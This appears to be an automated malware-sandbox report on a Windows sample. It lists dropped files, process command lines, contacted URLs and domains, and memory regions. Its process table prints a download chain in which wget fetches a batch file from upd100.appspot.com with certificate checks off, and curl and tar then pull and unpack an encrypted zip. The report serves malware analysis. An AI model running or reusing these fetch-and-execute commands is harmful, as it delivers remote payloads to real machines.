Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
C:\Users\user\Desktop\download\u.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\cmdline.out
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\Desktop\download\u.zip
|
Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
|
modified
|
||
\Device\ConDrv
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\wget.exe
|
wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://upd100.appspot.com/update/u.bat"
|
||
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition
--user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://upd100.appspot.com/update/u.bat"
> cmdline.out 2>&1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\download\u.bat" "
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl -o u.zip --insecure https://upd100.appspot.com/update/u.zip
|
||
C:\Windows\System32\tar.exe
|
tar xf u.zip
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://upd100.appspot.com/update/u.bat
|
|||
https://upd100.appspot.com/update/u.batG
|
unknown
|
||
https://upd100.appspot.com/update/u.bat
|
142.250.9.153
|
||
https://upd100.appspot.com/update/u.zipO
|
unknown
|
||
https://upd100.appspot.com/update/u.zip
|
142.250.9.153
|
||
https://upd100.appspot.com/update/u.zipcurl
|
unknown
|
||
https://upd100.appspot.com/update/u.zipWinsta0
|
unknown
|
||
https://upd100.appspot.com/update/u.zipu
|
unknown
|
||
https://upd100.appspot.com/update/u.bater
|
unknown
|
||
https://upd100.appspot.com/update/u.zipRmWO
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
upd100.appspot.com
|
142.250.9.153
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
127.0.0.1
|
unknown
|
unknown
|
||
142.250.9.153
|
upd100.appspot.com
|
United States
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
28312190000
|
heap
|
page read and write
|
||
1E441DCB000
|
heap
|
page read and write
|
||
2831228C000
|
heap
|
page read and write
|
||
283121A0000
|
heap
|
page read and write
|
||
9CD000
|
stack
|
page read and write
|
||
105F000
|
stack
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
106A000
|
heap
|
page read and write
|
||
F0B77D000
|
stack
|
page read and write
|
||
1D6000
|
heap
|
page read and write
|
||
283122A7000
|
heap
|
page read and write
|
||
B55A8FD000
|
stack
|
page read and write
|
||
2831229D000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
11AE000
|
heap
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
106D000
|
heap
|
page read and write
|
||
B55A9FE000
|
stack
|
page read and write
|
||
109F000
|
heap
|
page read and write
|
||
283121E0000
|
remote allocation
|
page read and write
|
||
1096000
|
heap
|
page read and write
|
||
2831228C000
|
heap
|
page read and write
|
||
11AC000
|
heap
|
page read and write
|
||
109E000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
100000
|
heap
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
28312267000
|
heap
|
page read and write
|
||
283122D0000
|
heap
|
page read and write
|
||
2831225B000
|
heap
|
page read and write
|
||
2831226A000
|
heap
|
page read and write
|
||
28312266000
|
heap
|
page read and write
|
||
1E441DF6000
|
heap
|
page read and write
|
||
28312250000
|
heap
|
page read and write
|
||
2831226F000
|
heap
|
page read and write
|
||
B55AAFF000
|
stack
|
page read and write
|
||
1E441DC0000
|
heap
|
page read and write
|
||
1060000
|
heap
|
page read and write
|
||
E5F000
|
stack
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
18E000
|
stack
|
page read and write
|
||
10A4000
|
heap
|
page read and write
|
||
283121E0000
|
remote allocation
|
page read and write
|
||
109A000
|
heap
|
page read and write
|
||
28312270000
|
heap
|
page read and write
|
||
283122A0000
|
heap
|
page read and write
|
||
2831226F000
|
heap
|
page read and write
|
||
2831228D000
|
heap
|
page read and write
|
||
ADE000
|
stack
|
page read and write
|
||
10A5000
|
heap
|
page read and write
|
||
283122B7000
|
heap
|
page read and write
|
||
28312272000
|
heap
|
page read and write
|
||
283122A4000
|
heap
|
page read and write
|
||
283121C0000
|
heap
|
page read and write
|
||
28312273000
|
heap
|
page read and write
|
||
1E441D00000
|
heap
|
page read and write
|
||
B68000
|
heap
|
page read and write
|
||
14E000
|
stack
|
page read and write
|
||
109E000
|
heap
|
page read and write
|
||
11A5000
|
heap
|
page read and write
|
||
283122B7000
|
heap
|
page read and write
|
||
1B0000
|
heap
|
page read and write
|
||
283122E9000
|
heap
|
page read and write
|
||
1E441D10000
|
heap
|
page read and write
|
||
283125F0000
|
heap
|
page read and write
|
||
283121E0000
|
remote allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
10A0000
|
heap
|
page read and write
|
||
28312257000
|
heap
|
page read and write
|
||
2E8F000
|
stack
|
page read and write
|
||
109A000
|
heap
|
page read and write
|
||
11AB000
|
heap
|
page read and write
|
||
11AD000
|
heap
|
page read and write
|
||
10A2000
|
heap
|
page read and write
|
There are 64 hidden memdumps, click here to show them.